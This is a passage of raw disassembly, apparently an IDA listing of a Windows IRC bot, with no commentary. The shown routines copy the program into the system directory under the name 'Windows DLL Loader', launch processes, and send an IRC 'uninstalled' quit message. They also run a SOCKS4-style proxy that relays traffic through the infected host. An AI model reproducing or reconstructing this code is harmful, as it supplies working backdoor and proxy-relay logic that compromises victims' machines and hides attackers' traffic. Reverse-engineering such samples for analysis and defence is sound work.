add esp, 0Ch
mov [ebp+var_368], 44h
and [ebp+var_338], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_368]
push eax
push 0
push 0
push 28h
push 1
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call dword_41707C ; CreateProcessA
call dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
locret_407146: ; CODE XREF: sub_406E8E+165�j
; sub_406E8E+21C�j
leave
retn
sub_406E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407148 proc near ; CODE XREF: sub_402A32+7BB�p
; sub_40A9CF+145F�p ...
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
call sub_406D47
push 104h
lea eax, [ebp+var_20C]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
and [ebp+var_108], 0
jmp short loc_407187
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_407148:loc_4072DB�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_407187: ; CODE XREF: sub_407148+30�j
mov eax, [ebp+var_108]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_4072E0
push 104h
lea eax, [ebp+var_104]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_104]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_4072DB
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
push 0
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short loc_4072D9
push offset dword_41EBBC
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call dword_417254 ; WSACleanup
push 0
call dword_41705C ; ExitProcess
loc_4072D9: ; CODE XREF: sub_407148+170�j
jmp short locret_40732B
; ---------------------------------------------------------------------------
loc_4072DB: ; CODE XREF: sub_407148+D8�j
jmp loc_40717A
; ---------------------------------------------------------------------------
loc_4072E0: ; CODE XREF: sub_407148+4F�j
push offset dword_41EBBC
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 0
call sub_406C51
add esp, 0Ch
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short locret_40732B
push offset dword_41EBBC
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call dword_417254 ; WSACleanup
push 0
call dword_41705C ; ExitProcess
locret_40732B: ; CODE XREF: sub_407148:loc_4072D9�j
; sub_407148+1C2�j
leave
retn
sub_407148 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40732D proc near ; DATA XREF: sub_40764D+145�o
var_16F0 = dword ptr -16F0h
var_16EC = dword ptr -16ECh
var_16E8 = dword ptr -16E8h
var_16E4 = dword ptr -16E4h
var_16E0 = byte ptr -16E0h
var_6E0 = byte ptr -6E0h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_5CF = byte ptr -5CFh
var_5CE = dword ptr -5CEh
var_5C8 = byte ptr -5C8h
var_1C8 = dword ptr -1C8h
var_1BE = byte ptr -1BEh
var_1AE = byte ptr -1AEh
var_1B = byte ptr -1Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 16F0h
call sub_416BC0
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_1C8]
mov [ebp+var_5D4], eax
push 0
push 408h
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40738F
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_407396
loc_40738F: ; CODE XREF: sub_40732D+5A�j
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407396: ; CODE XREF: sub_40732D+60�j
movzx eax, [ebp+var_5D0]
cmp eax, 4
jnz short loc_4073BA
movzx eax, [ebp+var_5CF]
cmp eax, 1
jnz short loc_4073BA
mov [ebp+var_16EC], 1
jmp short loc_4073C1
; ---------------------------------------------------------------------------
loc_4073BA: ; CODE XREF: sub_40732D+73�j
; sub_40732D+7F�j
and [ebp+var_16EC], 0
loc_4073C1: ; CODE XREF: sub_40732D+8B�j
mov eax, [ebp+var_16EC]
mov [ebp+var_4], eax
movsx eax, [ebp+var_1BE]
test eax, eax
jz short loc_4073F5
push 10h
lea eax, [ebp+var_1BE]
push eax
lea eax, [ebp+var_5C8]
push eax
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_4073F5
and [ebp+var_4], 0
loc_4073F5: ; CODE XREF: sub_40732D+A6�j
; sub_40732D+C2�j
movsx eax, [ebp+var_1B]
test eax, eax
jz short loc_407456
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_5D4]
call sub_4044F7
pop ecx
pop ecx
cmp [ebp+var_4], 0
jz short loc_407423
mov [ebp+var_16F0], offset byte_41DEC0
jmp short loc_40742D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: sub_40732D+E8�j
mov [ebp+var_16F0], offset dword_418EEC
loc_40742D: ; CODE XREF: sub_40732D+F4�j
push [ebp+var_16F0]
movzx eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_6E0]
push eax
push offset dword_418EB8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
loc_407456: ; CODE XREF: sub_40732D+CE�j
cmp [ebp+var_4], 0
jnz short loc_4074A0
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_4074A0: ; CODE XREF: sub_40732D+12D�j
push 0Ah
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE]
call dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE+2]
call dword_41721C ; inet_ntoa
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_5E0], eax
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
cmp [ebp+var_5E0], 0
jnz short loc_407537
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407537: ; CODE XREF: sub_40732D+1D7�j
mov [ebp+var_5CF], 5Ah
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
loc_407555: ; CODE XREF: sub_40732D+2FD�j
push [ebp+var_5D4]
call sub_40447B
pop ecx
test eax, eax
jz short loc_4075BD
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call dword_417248 ; recv
mov [ebp+var_16E4], eax
cmp [ebp+var_16E4], 0
jz short loc_407597
cmp [ebp+var_16E4], 0FFFFFFFFh
jnz short loc_40759C
loc_407597: ; CODE XREF: sub_40732D+25F�j
jmp loc_40762F
; ---------------------------------------------------------------------------
loc_40759C: ; CODE XREF: sub_40732D+268�j
push [ebp+var_16E4]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4075BD
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_4075BD: ; CODE XREF: sub_40732D+236�j
; sub_40732D+28C�j
push [ebp+var_5E0]
call sub_40447B
pop ecx
test eax, eax
jz short loc_407622
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call dword_417248 ; recv
mov [ebp+var_16E8], eax
cmp [ebp+var_16E8], 0
jz short loc_4075FF
cmp [ebp+var_16E8], 0FFFFFFFFh
jnz short loc_407601
loc_4075FF: ; CODE XREF: sub_40732D+2C7�j
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407601: ; CODE XREF: sub_40732D+2D0�j
push [ebp+var_16E8]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_407622
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407622: ; CODE XREF: sub_40732D+29E�j
; sub_40732D+2F1�j
push 32h
call dword_41709C ; Sleep
jmp loc_407555
; ---------------------------------------------------------------------------
loc_40762F: ; CODE XREF: sub_40732D:loc_407597�j
; sub_40732D+28E�j ...
push [ebp+var_5D4]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_40538D
pop ecx
xor eax, eax
locret_407649: ; CODE XREF: sub_40732D+64�j
; sub_40732D+16E�j ...
leave
retn 4
sub_40732D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40764D proc near ; DATA XREF: sub_4077DD+B4�o
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_1B6 = byte ptr -1B6h
var_1A6 = byte ptr -1A6h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1BC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jnz short loc_4076A8
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4077D9
; ---------------------------------------------------------------------------
loc_4076A8: ; CODE XREF: sub_40764D+46�j
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset dword_418EF8
lea eax, [ebp+var_1A6]
push eax
call sub_40D53F
add esp, 10h
loc_4076CB: ; CODE XREF: sub_40764D+B9�j
; sub_40764D+E1�j ...
push 3E8h
push [ebp+var_1C4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jnz short loc_4076F8
cmp [ebp+var_1C8], 0
jnz short loc_4076FD
loc_4076F8: ; CODE XREF: sub_40764D+A0�j
jmp loc_4077BF
; ---------------------------------------------------------------------------
loc_4076FD: ; CODE XREF: sub_40764D+A9�j
cmp [ebp+var_1C8], 0FFFFFFFFh
jnz short loc_407708
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407708: ; CODE XREF: sub_40764D+B7�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1CC], eax
cmp [ebp+var_1CC], 0
jnz short loc_407730
push [ebp+var_1C8]
call sub_4053B1
pop ecx
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407730: ; CODE XREF: sub_40764D+D3�j
mov eax, [ebp+var_1CC]
mov ecx, [ebp+var_1C8]
mov [eax], ecx
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1CC]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_1B6]
push eax
mov eax, [ebp+var_1CC]
add eax, 0Ah
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 1A3h
lea eax, [ebp+var_1A6]
push eax
mov eax, [ebp+var_1CC]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_1CC]
push offset sub_40732D
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4077BA
push [ebp+var_1CC]
call sub_416B4C ; free
pop ecx
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_4077BA: ; CODE XREF: sub_40764D+153�j
jmp loc_4076CB
; ---------------------------------------------------------------------------
loc_4077BF: ; CODE XREF: sub_40764D:loc_4076F8�j
push [ebp+var_1C4]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_4077D9: ; CODE XREF: sub_40764D+56�j
leave
retn 4
sub_40764D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DD proc near ; CODE XREF: sub_40A9CF+17A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_40780F
push 0Ah
lea eax, [ebp+var_8]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+arg_4], eax
loc_40780F: ; CODE XREF: sub_4077DD+A�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_407825
jmp short locret_40789E
; ---------------------------------------------------------------------------
loc_407825: ; CODE XREF: sub_4077DD+44�j
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_407844
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
jmp short loc_40784B
; ---------------------------------------------------------------------------
loc_407844: ; CODE XREF: sub_4077DD+5D�j
mov [ebp+var_10], offset byte_41DEC0
loc_40784B: ; CODE XREF: sub_4077DD+65�j
push 10h
push [ebp+var_10]
mov eax, [ebp+var_C]
add eax, 0Ah
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push offset dword_418F2C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_C]
push offset sub_40764D
call sub_4095A4
add esp, 14h
locret_40789E: ; CODE XREF: sub_4077DD+46�j
leave
retn
sub_4077DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078A0 proc near ; CODE XREF: sub_40A9CF+216�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4078B8
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078B8: ; CODE XREF: sub_4078A0+14�j
; sub_4078A0:loc_4078E2�j
cmp [ebp+var_4], 0
jnz short loc_4078C0
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078C0: ; CODE XREF: sub_4078A0+1C�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4078E0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
jmp short loc_4078E2
; ---------------------------------------------------------------------------
loc_4078E0: ; CODE XREF: sub_4078A0+33�j
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078E2: ; CODE XREF: sub_4078A0+3E�j
jmp short loc_4078B8
; ---------------------------------------------------------------------------
locret_4078E4: ; CODE XREF: sub_4078A0+16�j
; sub_4078A0+1E�j ...
leave
retn
sub_4078A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078E6 proc near ; CODE XREF: sub_407D42+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_4078FC
; ---------------------------------------------------------------------------
loc_4078F5: ; CODE XREF: sub_4078E6:loc_407921�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4078FC: ; CODE XREF: sub_4078E6+D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407923
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_407921
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407921: ; CODE XREF: sub_4078E6+32�j
jmp short loc_4078F5
; ---------------------------------------------------------------------------
loc_407923: ; CODE XREF: sub_4078E6+21�j
mov eax, [ebp+var_8]
leave
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407928 proc near ; CODE XREF: sub_40E618+2B�p
; sub_40E618+185�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_10], 0
jnz short loc_407963
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_8]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_C]
call sub_416B6A ; memset
add esp, 0Ch
xor eax, eax
jmp locret_407A54
; ---------------------------------------------------------------------------
loc_407963: ; CODE XREF: sub_407928+A�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+arg_0]
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov [ebp+var_8], 1
jmp short loc_4079A1
; ---------------------------------------------------------------------------
loc_40799A: ; CODE XREF: sub_407928:loc_407A4C�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4079A1: ; CODE XREF: sub_407928+70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jge loc_407A51
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4-4], 0
jz short loc_407A0A
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_8]
mov [edx+ecx*4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4], 0
jz short loc_4079F8
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov eax, [ecx+eax*4]
sub eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_4079FC
; ---------------------------------------------------------------------------
loc_4079F8: ; CODE XREF: sub_407928+B8�j
and [ebp+var_C], 0
loc_4079FC: ; CODE XREF: sub_407928+CE�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
mov [ecx+eax*4], edx
jmp short loc_407A4C
; ---------------------------------------------------------------------------
loc_407A0A: ; CODE XREF: sub_407928+90�j
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_8]
dec eax
jmp short locret_407A54
; ---------------------------------------------------------------------------
loc_407A4C: ; CODE XREF: sub_407928+E0�j
jmp loc_40799A
; ---------------------------------------------------------------------------
loc_407A51: ; CODE XREF: sub_407928+7F�j
mov eax, [ebp+arg_10]
locret_407A54: ; CODE XREF: sub_407928+36�j
; sub_407928+122�j
leave
retn
sub_407928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A56 proc near ; CODE XREF: sub_401146+6B�p
; sub_401146+CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_407A81
cmp ecx, 1
jz short loc_407A7E
loc_407A6E: ; CODE XREF: sub_407A56+26�j
mov al, [esi]
mov [edi], al
test al, al
jz short loc_407A81
inc esi
inc edi
dec ecx
cmp ecx, 1
jnz short loc_407A6E
loc_407A7E: ; CODE XREF: sub_407A56+16�j
mov byte ptr [edi], 0
loc_407A81: ; CODE XREF: sub_407A56+11�j
; sub_407A56+1E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407A56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A86 proc near ; CODE XREF: sub_4097A7+17�p
; sub_4098F3+17�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407A97
; ---------------------------------------------------------------------------
loc_407A90: ; CODE XREF: sub_407A86+3A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407A97: ; CODE XREF: sub_407A86+8�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407AC6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_407AC2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 39h
jg short loc_407AC2
jmp short loc_407A90
; ---------------------------------------------------------------------------
loc_407AC2: ; CODE XREF: sub_407A86+2A�j
; sub_407A86+38�j
xor al, al
jmp short locret_407AC8
; ---------------------------------------------------------------------------
loc_407AC6: ; CODE XREF: sub_407A86+1C�j
mov al, 1
locret_407AC8: ; CODE XREF: sub_407A86+3E�j
leave
retn
sub_407A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407ACA proc near ; CODE XREF: sub_401000+F6�p
; sub_4148CE+61�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_8]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
and [ebp+var_8], 0
and [ebp+var_C], 0
jmp short loc_407AED
; ---------------------------------------------------------------------------
loc_407AE6: ; CODE XREF: sub_407ACA:loc_407B58�j
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_407AED: ; CODE XREF: sub_407ACA+1A�j
mov eax, [ebp+arg_4]
sub eax, [ebp+var_4]
cmp [ebp+var_C], eax
jg short loc_407B5A
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
sub ecx, 20h
cmp eax, ecx
jnz short loc_407B58
loc_407B37: ; CODE XREF: sub_407ACA+3F�j
; sub_407ACA+55�j
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_407B58
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
jmp short locret_407B5C
; ---------------------------------------------------------------------------
loc_407B58: ; CODE XREF: sub_407ACA+6B�j
; sub_407ACA+84�j
jmp short loc_407AE6
; ---------------------------------------------------------------------------
loc_407B5A: ; CODE XREF: sub_407ACA+2C�j
xor eax, eax
locret_407B5C: ; CODE XREF: sub_407ACA+8C�j
leave
retn
sub_407ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B5E proc near ; CODE XREF: sub_40A2D2+11D�p
; sub_40E943+20�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_407B70
; ---------------------------------------------------------------------------
loc_407B69: ; CODE XREF: sub_407B5E:loc_407BEE�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407B70: ; CODE XREF: sub_407B5E+9�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407B85
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407B85: ; CODE XREF: sub_407B5E+1D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_407BA1
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_407BEE
loc_407BA1: ; CODE XREF: sub_407B5E+33�j
and [ebp+var_8], 0
jmp short loc_407BAE
; ---------------------------------------------------------------------------
loc_407BA7: ; CODE XREF: sub_407B5E:loc_407BEC�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407BAE: ; CODE XREF: sub_407B5E+47�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Dh
jz short loc_407BD2
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Ah
jnz short loc_407BE1
loc_407BD2: ; CODE XREF: sub_407B5E+60�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
and byte ptr [ecx+eax], 0
jmp short loc_407BEC
; ---------------------------------------------------------------------------
loc_407BE1: ; CODE XREF: sub_407B5E+72�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
add eax, [ebp+var_8]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407BEC: ; CODE XREF: sub_407B5E+81�j
jmp short loc_407BA7
; ---------------------------------------------------------------------------
loc_407BEE: ; CODE XREF: sub_407B5E+41�j
jmp loc_407B69
; ---------------------------------------------------------------------------
locret_407BF3: ; CODE XREF: sub_407B5E+25�j
; sub_407B5E+8C�j
leave
retn
sub_407B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF5 proc near ; CODE XREF: sub_411A09+5D�p
; sub_411A09+F3�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_407BF8: ; CODE XREF: sub_407BF5:loc_407C28�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
inc ecx
mov [ebp+arg_0], ecx
test eax, eax
jz short loc_407C2A
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407C15
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C15: ; CODE XREF: sub_407BF5+1C�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C28
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
